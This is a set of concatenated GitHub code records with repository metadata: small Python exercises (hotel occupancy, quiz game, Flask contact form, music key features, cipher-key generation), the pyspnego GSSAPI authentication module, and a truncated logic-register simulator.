redirect(\"/client/\")\n","repo_name":"ggonzaga29/qwarta","sub_path":"client_dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38994436677","text":"#Nueva clase\r\nclass Hotel:\r\n\r\n #Atributos de la instancia\r\n def __init__(self,numero_maximo_de_huespedes,lugares_de_estacionamiento):\r\n self.numero_maximo_de_huespedes=numero_maximo_de_huespedes\r\n self.lugares_de_estacionamiento=lugares_de_estacionamiento\r\n self.huespedes=0\r\n def añadir_huespedes(self,cantidad_huespedes):\r\n self.huespedes+=cantidad_huespedes\r\n\r\n def checkout(self,cantidad_huespedes):\r\n self.huespedes-=cantidad_huespedes\r\n \r\n def ocupacion_total(self):\r\n return self.huespedes\r\n\r\n#Instancia\r\nhotel=Hotel(numero_maximo_de_huespedes=50,lugares_de_estacionamiento=23)\r\nopc=0\r\nwhile opc!=4:\r\n print(\"-------Bienvenido a nuestra cadena de hoteles--------\")\r\n print(\"1.- Entrada de huésped\")\r\n print(\"2.- Salida de huésped\")\r\n print(\"3.- Mostrar huéspedes\")\r\n 
print(\"4.- Salir\")\r\n opc=int(input('Ingrese una opción del menú: '))\r\n if opc==1 or opc==2:\r\n num_huespedes=int(input(\"Ingrese el número de huéspedes: \"))\r\n if opc==1:\r\n hotel.añadir_huespedes(num_huespedes)\r\n elif opc==2:\r\n hotel.checkout(num_huespedes)\r\n elif opc==3:\r\n print(f'\\nEl hotel tiene una ocupación de {hotel.ocupacion_total()} huéspedes\\n')\r\n else:\r\n break","repo_name":"alejandromarroquin/functionsandalgorithmswithpython","sub_path":"Clases-Atributos.py","file_name":"Clases-Atributos.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20704696278","text":"import sys\nfrom collections import Counter\nfrom operator import itemgetter\nimport pandas\n\n# run as\n# py translate.py csv-file dataset-file\n\ncsv = open(sys.argv[1], \"r\")\n\nKEYS_CSV_PATH = \"keys.csv\"\nDATA_FILE_PATH = \"data_keys.csv\"\n\ndef getKey(filename):\n keys = pandas.read_csv(KEYS_CSV_PATH, dtype={'bwv': object})\n bwv_str = filename.split('\\\\')[-1][:4]\n return keys.loc[keys['bwv'] == bwv_str]['key'].iloc[0]\n\ncontent = []\n\n# clean unnecessary lines\nfor line in csv:\n if \"Note_on_c\" in line:\n fields = line.split(\", \")\n content.append(fields)\n\nnote_freq = [0] * 12\n\n# count each note class \nfor i in range(0, len(content)):\n if content[i][2] == \"Note_on_c\" and int(content[i][5]) != 0:\n note_freq[int(content[i][4]) % 12] += 1\n\n# compute the frequency of each note class\nnote_freq = [el / sum(note_freq) for el in note_freq]\n\nkey = getKey(sys.argv[1])\n\ndata_file = open(DATA_FILE_PATH, \"a\")\ndata_file.write(','.join([str(el) for el in note_freq]) + \",\" + key + \"\\n\")","repo_name":"deliaedumitru/key-detector","sub_path":"calculate-note-weights.py","file_name":"calculate-note-weights.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34245459650","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.base, name=\"base\"), #for base\n path('home', views.home, name=\"home\"), #after login\n path('delete/', views.delete, name=\"delete\"), #when u delete\n \n \n \n \n]","repo_name":"raj26kumar/wishlist","sub_path":"list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18820827405","text":"class QuizBrain:\r\n def __init__(self, question_list):\r\n self.question_number = 0\r\n self.question_list = question_list\r\n self.current_score = 0\r\n\r\n def still_has_questions(self):\r\n if self.question_number < len(self.question_list):\r\n questions_remaining = True\r\n else:\r\n questions_remaining = False\r\n return questions_remaining\r\n\r\n def next_question(self):\r\n current_question = self.question_list[self.question_number]\r\n self.question_number += 1\r\n answer = input(f\"{self.question_number} {current_question.text} Please enter your answer: \")\r\n self.check_answer(answer, current_question.answer)\r\n\r\n def check_answer(self, user_answer, correct_answer):\r\n if user_answer.lower() == correct_answer.lower():\r\n print(\"correct answer\")\r\n self.current_score += 1\r\n else:\r\n print(f\"That's wrong\")\r\n print(f\"The correct answer was {correct_answer} \")\r\n print(f\"Your current score is: {self.current_score}/{self.question_number}\")\r\n print(\"\\n\")\r\n\r\n def finish_game(self):\r\n print(\"You have completed the quiz\")\r\n print(f\"Your final score was: {self.current_score}/{self.question_number}\")","repo_name":"greenhalghdan/quiz-game-start","sub_path":"quiz_brain.py","file_name":"quiz_brain.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74031732851","text":"from flask import Flask, render_template, request, redirect, url_for, flash, session\nfrom datetime import datetime, date\nimport sys\nimport os\nfrom app import app\nfrom app.forms import ContactForm\nimport json\n# app = Flask(__name__)\nmenu = {'Головна':'/', 'Коротка інформація':'/info', 'Мої досягнення':'/achievement', 'Contact':'/contact'}\ntoday = date.today()\nage = today.year - 2001 - ((today.month, today.day) < (4, 14))\n@app.route('/')\ndef index():\n return render_template('index.html', menu=menu, my_os=os.uname(),\n user_agent=request.headers.get('User-Agent'), version=sys.version,\n time_now=datetime.now().strftime(\"%H:%M\"))\n\n@app.route('/info')\ndef info():\n return render_template('info.html', menu=menu,age=age, month=today.month, day=today.day)\n\n@app.route('/achievement')\ndef achievement():\n return render_template('achievement.html', menu=menu)\n\n@app.route('/contact', methods=[\"GET\", \"POST\"])\ndef contact():\n form = ContactForm()\n cookie_name = session.get(\"name\")\n cookie_email = session.get(\"email\")\n print(cookie_email,cookie_name)\n if request.method == 'POST':\n if cookie_name is None and cookie_email is None: # якщо кукі не встановлено, тобто ми перший раз відкрили сторінку\n if form.validate_on_submit():\n name = form.name.data\n email = form.email.data\n body = form.body.data\n session['name'] = name\n session['email'] = email\n with open('data.txt', 'a') as outfile:\n json.dump({'name': session.get(\"name\"), 'email': session.get(\"email\"), 'body': body}, outfile)\n outfile.write('\\n')\n flash(message='Повідомлення надіслано успішно!')\n return redirect(url_for('contact'))\n 
else:\n flash(message='Помилка відправки повідомлення!')\n else: # якщо вхід на сторіку здійснено повторно\n form.name.data = cookie_name # встановлюємо значення для форми name та email\n form.email.data = cookie_email\n if form.validate_on_submit():\n body = form.body.data\n with open('data.txt', 'a') as outfile:\n json.dump({'name': session.get(\"name\"), 'email': session.get(\"email\"), 'body': body}, outfile)\n outfile.write('\\n')\n flash(message='Повідомлення надіслано успішно!')\n return redirect(url_for('contact'))\n else:\n flash(message='Помилка відправки повідомлення!')\n return render_template('contact_form.html', menu=menu, form=form, cookie_name=session.get(\"name\"), cookie_email=session.get(\"email\"))","repo_name":"dima-yurchuk/web_programming_python","sub_path":"portfolio_wtf_form/app/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14203092792","text":"from factorial import factorial\r\nfrom randkey import randomkey\r\nn=randomkey()\r\nrandslist=[]\r\ni=factorial(26)\r\nf=open('list.txt','w')\r\nf.write(\"************\")\r\nf.write(\"$\")\r\nf.write(n)\r\nf.write(\"$***********\\n the keys are\\n\")\r\nwhile i>0:\r\n\tj=randomkey()\r\n\trandslist.append(j)\r\n\tprint(i)\r\n\tf.write(j)\r\n\tf.write('\\n')\r\n\tif n in randslist:\r\n\t\tbreak\r\n\t\r\n\ti=i-1\r\nf.close()\r\nif n in randslist:\r\n\tm=randslist.count(n)\r\n\tprint(m)\r\ninput(' ')\r\ninput(' ')","repo_name":"harishpichukala/mycrypt","sub_path":"historical/substitution/cryptanasisofrandkey.py","file_name":"cryptanasisofrandkey.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32416402138","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type # noqa (fixes E402 for the imports below)\n\nimport base64\nimport contextlib\nimport logging\nimport os\nimport sys\nimport tempfile\n\nfrom spnego._compat import (\n Generator,\n List,\n Optional,\n Tuple,\n reraise,\n)\n\nfrom spnego._context import (\n ContextProxy,\n ContextReq,\n GSSMech,\n IOVWrapResult,\n IOVUnwrapResult,\n UnwrapResult,\n WinRMWrapResult,\n WrapResult,\n wrap_system_error,\n)\n\nfrom spnego._text import (\n text_type,\n to_bytes,\n to_text,\n)\n\nfrom spnego.exceptions import (\n GSSError as NativeError,\n NegotiateOptions,\n SpnegoError,\n)\n\nfrom spnego.iov import (\n BufferType,\n IOVBuffer,\n)\n\n\nlog = logging.getLogger(__name__)\n\nHAS_GSSAPI = True\nGSSAPI_IMP_ERR = None\ntry:\n import gssapi\n\n from gssapi.raw import (\n acquire_cred_with_password,\n ChannelBindings,\n exceptions as gss_errors,\n GSSError,\n inquire_sec_context_by_oid,\n set_sec_context_option,\n )\nexcept ImportError:\n GSSAPI_IMP_ERR = sys.exc_info()\n HAS_GSSAPI = False\n log.debug(\"Python gssapi not available, cannot use any GSSAPIProxy protocols: %s\" % str(GSSAPI_IMP_ERR[1]))\n\n\nHAS_IOV = True\nGSSAPI_IOV_IMP_ERR = None\ntry:\n from gssapi.raw import (\n IOV,\n IOVBufferType,\n unwrap_iov,\n wrap_iov,\n )\nexcept ImportError as err:\n GSSAPI_IOV_IMP_ERR = sys.exc_info()\n HAS_IOV = False\n log.debug(\"Python gssapi IOV extension not available: %s\" % str(GSSAPI_IOV_IMP_ERR[1]))\n\n_GSS_C_INQ_SSPI_SESSION_KEY = \"1.2.840.113554.1.2.2.5.5\"\n\n# https://github.com/simo5/gss-ntlmssp/blob/bfc7232dbb2259072a976fc9cdb6ae4bfd323304/src/gssapi_ntlmssp.h#L68\n_GSS_NTLMSSP_RESET_CRYPTO_OID = 
'1.3.6.1.4.1.7165.655.1.3'\n\n# https://github.com/krb5/krb5/blob/master/src/lib/gssapi/spnego/spnego_mech.c#L483\n_GSS_SPNEGO_REQUIRE_MIC_OID_STRING = '1.3.6.1.4.1.7165.655.1.2'\n\n\ndef _available_protocols(options=None): # type: (Optional[NegotiateOptions]) -> List[str, ...]\n \"\"\" Return a list of protocols that GSSAPIProxy can offer. \"\"\"\n if not options:\n options = NegotiateOptions(0)\n\n protocols = []\n if HAS_GSSAPI:\n # We can't offer Kerberos if the caller requires WinRM wrapping and IOV isn't available.\n if not (options & NegotiateOptions.wrapping_winrm and not HAS_IOV):\n protocols = ['kerberos']\n\n # We can only offer NTLM if the mech is installed and can retrieve the functionality the caller desires.\n if _gss_ntlmssp_available(session_key=bool(options & NegotiateOptions.session_key)):\n protocols.append('ntlm')\n\n # We can only offer Negotiate if we can offer both Kerberos and NTLM.\n if len(protocols) == 2:\n protocols.append('negotiate')\n\n return protocols\n\n\ndef _create_iov_result(iov): # type: (IOV) -> Tuple[IOVBuffer, ...]\n \"\"\" Converts GSSAPI IOV buffer to generic IOVBuffer result. \"\"\"\n buffers = []\n for i in iov:\n buffer_entry = IOVBuffer(type=BufferType(i.type), data=i.value)\n buffers.append(buffer_entry)\n\n return tuple(buffers)\n\n\n@contextlib.contextmanager\ndef _env_path(name, value, default_value): # type: (str, str, str) -> Generator[None, None, None]\n \"\"\" Adds a value to a PATH-like env var and preserve the existing value if present. \"\"\"\n orig_value = os.environ.get(name, None)\n os.environ[name] = '%s:%s' % (value, orig_value or default_value)\n try:\n yield\n\n finally:\n if orig_value:\n os.environ[name] = orig_value\n\n else:\n del os.environ[name]\n\n\n@contextlib.contextmanager\ndef _krb5_conf(forwardable=False): # type: (bool) -> Generator[None, None, None]\n \"\"\" Runs with a custom krb5.conf file that extends the existing config if present. \"\"\"\n if forwardable:\n with tempfile.NamedTemporaryFile() as temp_cfg:\n temp_cfg.write(b\"[libdefaults]\\nforwardable = true\\n\")\n temp_cfg.flush()\n\n with _env_path('KRB5_CONFIG', temp_cfg.name, '/etc/krb5.conf'):\n yield\n\n return\n\n yield\n\n\ndef _get_gssapi_credential(mech, usage, username=None, password=None, context_req=None):\n # type: (gssapi.OID, str, Optional[text_type], Optional[text_type]) -> gssapi.creds.Credentials\n \"\"\"Gets a set of credential(s).\n\n Will get a set of GSSAPI credential(s) for the mech specified. If the username and password is specified then a new\n set of credentials are explicitly required for the mech specified. Otherwise the credentials are retrieved by the\n cache as defined by the mech.\n\n The behaviour of this function is highly dependent on the GSSAPI implementation installed as well as what NTLM mech\n is available. Here are some of the known behaviours of each mech.\n\n Kerberos:\n Works for any GSSAPI implementation. The cache is the CCACHE which can be managed with `kinit`.\n\n NTLM:\n Only works with MIT krb5 and requires `gss-ntlmssp`_ to be installed. The cache that this mech uses is either\n a plaintext file specified by `NTLM_USER_FILE` in the format `DOMAIN:USERNAME:PASSWORD` or\n `:USER_UPN@REALM:PASSWORD` or it can be configured with winbind to a standalone Samba setup or with AD.\n\n SPNEGO:\n To work properly it requires both Kerberos and NTLM to be available where the latter only works with MIT krb5,\n see `NTLM` for more details. 
It attempts to get a credential for the all the mechs that SPNEGO supports so it\n will retrieve a Kerberos cred then NTLM.\n\n Args:\n mech: The mech OID to get the credentials for.\n usage: Either `initiate` for a client context or `accept` for a server context.\n username: The username to get the credentials for, if omitted then the default user is gotten from the cache.\n password: The password for the user, if omitted then the cached credentials is retrieved.\n\n Returns:\n gssapi.creds.Credentials: The credential set that was created/retrieved.\n\n .. _gss-ntlmssp:\n https://github.com/gssapi/gss-ntlmssp\n \"\"\"\n if username:\n name_type = getattr(gssapi.NameType, 'user' if usage == 'initiate' else 'hostbased_service')\n username = gssapi.Name(base=username, name_type=name_type)\n\n if username and password:\n # NOTE: MIT krb5 < 1.14 would store this cred in the global cache but later versions used a private cache in\n # memory. There's not much we can do about this but document this behaviour and hope people upgrade to a newer\n # version.\n # GSSAPI offers no way to specify custom flags like forwardable. We use a temp conf file to ensure an explicit\n # cred with the delegate flag will actually be forwardable.\n forwardable = False\n forwardable_mechs = [gssapi.OID.from_int_seq(GSSMech.kerberos.value),\n gssapi.OID.from_int_seq(GSSMech.spnego.value)]\n if context_req and context_req & ContextReq.delegate and mech in forwardable_mechs:\n forwardable = True\n\n with _krb5_conf(forwardable=forwardable):\n cred = acquire_cred_with_password(username, to_bytes(password), usage=usage, mechs=[mech])\n\n return cred.creds\n\n cred = gssapi.Credentials(name=username, usage=usage, mechs=[mech])\n\n # We don't need to check the actual lifetime, just trying to get the valid will have gssapi check the lifetime and\n # raise an ExpiredCredentialsError if it is expired.\n _ = cred.lifetime\n\n return cred\n\n\ndef _gss_ntlmssp_available(session_key=False): # type: (bool) -> bool\n \"\"\"Determine if NTLM is available through GSSAPI.\n\n NTLM support through GSSAPI is a complicated story. Because we rely on NTLM being available for SPNEGO fallback\n when Kerberos doesn't work we need to make sure the currently installed provider will give us what we need.\n\n Here is the current lay of the land for each GSSAPI provider.\n\n MIT KRB5:\n MIT KRB5 does not have NTLM builtin but it can be added with the `gss-ntlmssp`_ provider. We check to make sure\n the NTLM mech is installed and implements the required functions that are needed for SPNEGO support.\n\n The `gss-ntlmssp`_ provider only recently added support for retrieving its session key in v0.9.0. Not all\n callers need this behaviour so the `session_key` arg can be used to do a further check on that if needed.\n\n Heimdal:\n There are 2 major variants for Heimdal; 1. macOS' implementation, and 2. the actual Heimdal distribution. 
Each\n build has builtin \"support\" for NTLM but so far they are not usable for this library because:\n\n * macOS' implementation doesn't produce valid tokens, they are rejected by the server.\n * Pure Heimdal `gss_acquire_cred_with_password` isn't implemented for NTLM, no explicit creds.\n * Doesn't seem to produce a NTLM v2 message so the strength is even less than what our Python impl can offer.\n * It is doubtful it implements the required functions that MIT KRB5 relies on to get SPNEGO working.\n\n Because of these reasons we don't consider NTLM usable through GSSAPI on Heimdal based setups.\n\n Args:\n session_key: Whether the caller will want access to the session key of the context.\n\n Returns:\n bool: Whether NTLM is available to use (True) or not (False).\n\n .. _gss-ntlmssp:\n https://github.com/gssapi/gss-ntlmssp\n \"\"\"\n # Cache the result so we don't run this check multiple times.\n try:\n res = _gss_ntlmssp_available.result\n return res['session_key'] if session_key else res['available']\n except AttributeError:\n pass\n\n ntlm_features = {\n 'available': False,\n 'session_key': False,\n }\n\n # If any of these calls results in a GSSError we treat that as NTLM being unusable because these are standard\n # behaviours we expect to work.\n ntlm = gssapi.OID.from_int_seq(GSSMech.ntlm.value)\n try:\n # This can be anything, the first NTLM message doesn't need a valid target name or credential.\n spn = gssapi.Name('http@test', name_type=gssapi.NameType.hostbased_service)\n cred = _get_gssapi_credential(ntlm, 'initiate', username='user', password='pass')\n context = gssapi.SecurityContext(creds=cred, usage='initiate', name=spn, mech=ntlm)\n\n context.step() # Need to at least have a context set up before we can call gss_set_sec_context_option.\n\n # macOS' Heimdal implementation will work up to this point but the end messages aren't actually valid. Luckily\n # it does not implement 'GSS_NTLMSSP_RESET_CRYPTO_OID' so by running this we can weed out that broken impl.\n _gss_ntlmssp_reset_crypto(context)\n\n ntlm_features['available'] = True\n except GSSError as gss_err:\n log.debug(\"GSSAPI does not support required the NTLM interfaces: %s\" % str(gss_err))\n else:\n # gss-ntlmssp only recently added support for GSS_C_INQ_SSPI_SESSION_KEY in v0.9.0, we check if it is present\n # before declaring session_key support is there as it might control whether it is used or not.\n # https://github.com/gssapi/gss-ntlmssp/issues/10\n try:\n inquire_sec_context_by_oid(context, gssapi.OID.from_int_seq(_GSS_C_INQ_SSPI_SESSION_KEY))\n except gss_errors.OperationUnavailableError as o_err:\n # (GSS_S_UNAVAILABLE | ERR_NOTAVAIL) is raised when ntlmssp does support GSS_C_INQ_SSPI_SESSION key but\n # the context is not yet established. Any other errors would mean this isn't supported and we can't use\n # the current version installed if we need session_key interrogation.\n # https://github.com/gssapi/gss-ntlmssp/blob/9d7a275a4d6494606fb54713876e4f5cbf4d1362/src/gss_sec_ctx.c#L1277\n if getattr(o_err, 'min_code', 0) == 1314127894: # ERR_NOTAVAIL\n ntlm_features['session_key'] = True\n\n else:\n log.debug(\"GSSAPI ntlmssp does not support session key interrogation: %s\" % str(o_err))\n\n _gss_ntlmssp_available.result = ntlm_features\n return _gss_ntlmssp_available(session_key=session_key)\n\n\ndef _gss_ntlmssp_reset_crypto(context, outgoing=True): # type: (gssapi.SecurityContext, bool) -> None\n \"\"\" Resets the NTLM RC4 ciphers when being used with SPNEGO. 
\"\"\"\n reset_crypto = gssapi.OID.from_int_seq(_GSS_NTLMSSP_RESET_CRYPTO_OID)\n value = b\"\\x00\\x00\\x00\\x00\" if outgoing else b\"\\x01\\x00\\x00\\x00\"\n set_sec_context_option(reset_crypto, context=context, value=value)\n\n\ndef _gss_sasl_description(mech): # type: (gssapi.OID) -> Optional[bytes]\n \"\"\" Attempts to get the SASL description of the mech specified. \"\"\"\n try:\n res = _gss_sasl_description.result\n return res[mech.dotted_form]\n\n except (AttributeError, KeyError):\n res = getattr(_gss_sasl_description, 'result', {})\n\n try:\n sasl_desc = gssapi.raw.inquire_saslname_for_mech(mech).mech_description\n except Exception as e:\n log.debug(\"gss_inquire_saslname_for_mech(%s) failed: %s\" % (mech.dotted_form, str(e)))\n sasl_desc = None\n\n res[mech.dotted_form] = sasl_desc\n _gss_sasl_description.result = res\n return _gss_sasl_description(mech)\n\n\nclass GSSAPIProxy(ContextProxy):\n \"\"\"GSSAPI proxy class for GSSAPI on Linux.\n\n This proxy class for GSSAPI exposes GSSAPI calls into a common interface for SPNEGO authentication. This context\n uses the Python gssapi library to interface with the gss_* calls to provider Kerberos, and potentially native\n ntlm/negotiate functionality.\n \"\"\"\n def __init__(self, username=None, password=None, hostname=None, service=None, channel_bindings=None,\n context_req=ContextReq.default, usage='initiate', protocol='negotiate', options=0, _is_wrapped=False):\n\n if not HAS_GSSAPI:\n reraise(ImportError(\"GSSAPIProxy requires the Python gssapi library\"), GSSAPI_IMP_ERR)\n\n super(GSSAPIProxy, self).__init__(username, password, hostname, service, channel_bindings, context_req, usage,\n protocol, options, _is_wrapped)\n\n mech_str = {\n 'kerberos': GSSMech.kerberos.value,\n 'negotiate': GSSMech.spnego.value,\n 'ntlm': GSSMech.ntlm.value,\n }[self.protocol]\n mech = gssapi.OID.from_int_seq(mech_str)\n\n cred = None\n try:\n cred = _get_gssapi_credential(mech, self.usage, username=username, password=password,\n context_req=context_req)\n except GSSError as gss_err:\n reraise(SpnegoError(base_error=gss_err, context_msg=\"Getting GSSAPI credential\"))\n\n context_kwargs = {}\n\n if self.channel_bindings:\n context_kwargs['channel_bindings'] = ChannelBindings(\n initiator_address_type=self.channel_bindings.initiator_addrtype,\n initiator_address=self.channel_bindings.initiator_address,\n acceptor_address_type=self.channel_bindings.acceptor_addrtype,\n acceptor_address=self.channel_bindings.acceptor_address,\n application_data=self.channel_bindings.application_data\n )\n\n if self.usage == 'initiate':\n spn = to_text(\"%s@%s\" % (service.lower() if service else 'host', hostname or 'unspecified'))\n context_kwargs['name'] = gssapi.Name(spn, name_type=gssapi.NameType.hostbased_service)\n context_kwargs['mech'] = mech\n context_kwargs['flags'] = self._context_req\n\n self._context = gssapi.SecurityContext(creds=cred, usage=self.usage, **context_kwargs)\n\n @classmethod\n def available_protocols(cls, options=None):\n return _available_protocols(options=options)\n\n @classmethod\n def iov_available(cls):\n # NOTE: Even if the IOV headers are unavailable, if NTLM was negotiated then IOV won't work. 
Unfortunately we\n # cannot determine that here as we may not know the protocol until after negotiation.\n return HAS_IOV\n\n @property\n def client_principal(self):\n if self.usage == 'accept':\n # Looks like a bug in python-gssapi where the value still has the terminating null char.\n return to_text(self._context.initiator_name).rstrip(u'\\x00')\n\n @property\n def complete(self):\n return self._context.complete\n\n @property\n def negotiated_protocol(self):\n try:\n # For an acceptor this can be blank until the first token is received\n oid = self._context.mech.dotted_form\n except AttributeError:\n return\n\n return {\n GSSMech.kerberos.value: 'kerberos',\n GSSMech.ntlm.value: 'ntlm',\n\n # Only set until the negotiate process is complete, will change to one of the above once the context is\n # set up.\n GSSMech.spnego.value: 'negotiate',\n }.get(oid, 'unknown: %s' % self._context.mech.dotted_form)\n\n @property\n @wrap_system_error(NativeError, \"Retrieving session key\")\n def session_key(self):\n return inquire_sec_context_by_oid(self._context, gssapi.OID.from_int_seq(_GSS_C_INQ_SSPI_SESSION_KEY))[0]\n\n @wrap_system_error(NativeError, \"Processing security token\")\n def step(self, in_token=None):\n if not self._is_wrapped:\n log.debug(\"GSSAPI step input: %s\", to_text(base64.b64encode(in_token or b\"\")))\n\n out_token = self._context.step(in_token)\n self._context_attr = int(self._context.actual_flags)\n\n if not self._is_wrapped:\n log.debug(\"GSSAPI step output: %s\", to_text(base64.b64encode(out_token or b\"\")))\n\n return out_token\n\n @wrap_system_error(NativeError, \"Wrapping data\")\n def wrap(self, data, encrypt=True, qop=None):\n res = gssapi.raw.wrap(self._context, data, confidential=encrypt, qop=qop)\n\n # gss-ntlmssp used to hardcode the conf_state=0 which results in encrpted=False. 
Because we know it is always\n # sealed we just manually set to True.\n # https://github.com/gssapi/gss-ntlmssp/pull/15\n encrypted = True if self.negotiated_protocol == 'ntlm' else res.encrypted\n\n return WrapResult(data=res.message, encrypted=encrypted)\n\n @wrap_system_error(NativeError, \"Wrapping IOV buffer\")\n def wrap_iov(self, iov, encrypt=True, qop=None):\n iov_buffer = IOV(*self._build_iov_list(iov), std_layout=False)\n encrypted = wrap_iov(self._context, iov_buffer, confidential=encrypt, qop=qop)\n\n return IOVWrapResult(buffers=_create_iov_result(iov_buffer), encrypted=encrypted)\n\n def wrap_winrm(self, data):\n if self.negotiated_protocol == 'ntlm':\n # NTLM does not support IOV wrapping, luckily the header is a fixed size so we can split at that.\n wrap_result = self.wrap(data).data\n header = wrap_result[:16]\n enc_data = wrap_result[16:]\n padding = b\"\"\n\n else:\n iov = self.wrap_iov([BufferType.header, data, BufferType.padding]).buffers\n header = iov[0].data\n enc_data = iov[1].data\n padding = iov[2].data or b\"\"\n\n return WinRMWrapResult(header=header, data=enc_data + padding, padding_length=len(padding))\n\n @wrap_system_error(NativeError, \"Unwrapping data\")\n def unwrap(self, data):\n res = gssapi.raw.unwrap(self._context, data)\n\n # See wrap for more info.\n encrypted = True if self.negotiated_protocol == 'ntlm' else res.encrypted\n\n return UnwrapResult(data=res.message, encrypted=encrypted, qop=res.qop)\n\n @wrap_system_error(NativeError, \"Unwrapping IOV buffer\")\n def unwrap_iov(self, iov):\n iov_buffer = IOV(*self._build_iov_list(iov), std_layout=False)\n res = unwrap_iov(self._context, iov_buffer)\n\n return IOVUnwrapResult(buffers=_create_iov_result(iov_buffer), encrypted=res.encrypted, qop=res.qop)\n\n def unwrap_winrm(self, header, data):\n # This is an extremely weird setup, we need to use gss_unwrap for NTLM but for Kerberos it depends on the\n # underlying provider that is used. Right now the proper IOV buffers required to work on both AES and RC4\n # encrypted only works for MIT KRB5 whereas Heimdal fails. It currently mandates a padding buffer of a\n # variable size which we cannot achieve in the way that WinRM encrypts the data. This is fixed in the source\n # code but until it is widely distributed we just need to use a way that is known to just work with AES. 
To\n # ensure that MIT works on both RC4 and AES we check the description which differs between the 2 implemtations.\n # It's not perfect but I don't know of another way to achieve this until more time has passed.\n # https://github.com/heimdal/heimdal/issues/739\n sasl_desc = _gss_sasl_description(self._context.mech)\n\n # https://github.com/krb5/krb5/blob/f2e28f13156785851819fc74cae52100e0521690/src/lib/gssapi/krb5/gssapi_krb5.c#L686\n if sasl_desc and sasl_desc == b'Kerberos 5 GSS-API Mechanism':\n # TODO: Should done when self.negotiated_protocol == 'kerberos', above explains why this can't be done yet.\n iov = self.unwrap_iov([\n (IOVBufferType.header, header),\n data,\n IOVBufferType.data\n ]).buffers\n return iov[1].data\n\n else:\n return self.unwrap(header + data).data\n\n @wrap_system_error(NativeError, \"Signing message\")\n def sign(self, data, qop=None):\n return gssapi.raw.get_mic(self._context, data, qop=qop)\n\n @wrap_system_error(NativeError, \"Verifying message\")\n def verify(self, data, mic):\n return gssapi.raw.verify_mic(self._context, data, mic)\n\n @property\n def _context_attr_map(self):\n attr_map = [\n (ContextReq.delegate, 'delegate_to_peer'),\n (ContextReq.mutual_auth, 'mutual_authentication'),\n (ContextReq.replay_detect, 'replay_detection'),\n (ContextReq.sequence_detect, 'out_of_sequence_detection'),\n (ContextReq.confidentiality, 'confidentiality'),\n (ContextReq.integrity, 'integrity'),\n\n # Only present when the DCE extensions are installed.\n (ContextReq.identify, 'identify'),\n\n # Only present with newer versions of python-gssapi https://github.com/pythongssapi/python-gssapi/pull/218.\n (ContextReq.delegate_policy, 'ok_as_delegate'),\n ]\n attrs = []\n for spnego_flag, gssapi_name in attr_map:\n if hasattr(gssapi.RequirementFlag, gssapi_name):\n attrs.append((spnego_flag, getattr(gssapi.RequirementFlag, gssapi_name)))\n\n return attrs\n\n @property\n def _requires_mech_list_mic(self):\n try:\n require_mic = gssapi.OID.from_int_seq(_GSS_SPNEGO_REQUIRE_MIC_OID_STRING)\n res = inquire_sec_context_by_oid(self._context, require_mic)\n except GSSError:\n # Not all gssapi mechs implement this OID, the other mechListMIC rules still apply but are calc elsewhere.\n return False\n else:\n return b\"\\x01\" in res\n\n def _convert_iov_buffer(self, iov_buffer): # type: (IOVBuffer) -> Tuple[int, bool, Optional[bytes]]\n buffer_data = None\n buffer_alloc = False\n\n if isinstance(iov_buffer.data, bytes):\n buffer_data = iov_buffer.data\n elif isinstance(iov_buffer.data, int):\n # This shouldn't really occur on GSSAPI but is here to mirror what SSPI does.\n buffer_data = b\"\\x00\" * iov_buffer.data\n else:\n auto_alloc = [BufferType.header, BufferType.padding, BufferType.trailer]\n\n buffer_alloc = iov_buffer.data\n if buffer_alloc is None:\n buffer_alloc = iov_buffer.type in auto_alloc\n\n return iov_buffer.type, buffer_alloc, buffer_data\n\n @wrap_system_error(NativeError, \"NTLM reset crypto state\")\n def _reset_ntlm_crypto_state(self, outgoing=True):\n if self.negotiated_protocol == 'ntlm':\n _gss_ntlmssp_reset_crypto(self._context, outgoing=outgoing)\n","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/spnego/gss.py","file_name":"gss.py","file_ext":"py","file_size_in_byte":24239,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"39019830451","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 29 17:10:01 2020\r\n\r\n@author: 
dcr\r\n\"\"\"\r\nfrom .base import Logic\r\nfrom .logic import Not\r\nfrom .logic import Mux2\r\nfrom .base import Wire\r\n\r\nclass Reg(Logic):\r\n \"\"\"\r\n This is a D flip flop\r\n \"\"\"\r\n def __init__(self, parent, name:str, d:Wire, e:Wire, q:Wire, ):\r\n super().__init__(parent, name)\r\n self.d = self.addIn(\"d\", d)\r\n self.e = self.addIn(\"e\", e)\r\n self.q = self.addOut(\"q\", q)\r\n self.value = 0\r\n \r\n def clock(self):\r\n if (self.e.get() & 1):\r\n self.value = self.d.get()\r\n self.q.prepare(self.value)\r\n \r\n #print(self.name, 'sel', self.e.get(), self.d.get(), 'value prepared=', self.value)\r\n \r\n port = self.d.getSource()\r\n #print('d source', port.name, port.parent.getFullPath())\r\n else:\r\n #maintain the same value\r\n self.q.prepare(self.value)\r\n \r\n \r\n \r\nclass TReg(Logic):\r\n def __init__(self, parent, name:str, t:Wire, e:Wire, q:Wire, ):\r\n super().__init__(parent, name)\r\n self.t = self.addIn(\"t\", t)\r\n self.e = self.addIn(\"e\", e)\r\n self.q = self.addOut(\"q\", q)\r\n \r\n nq 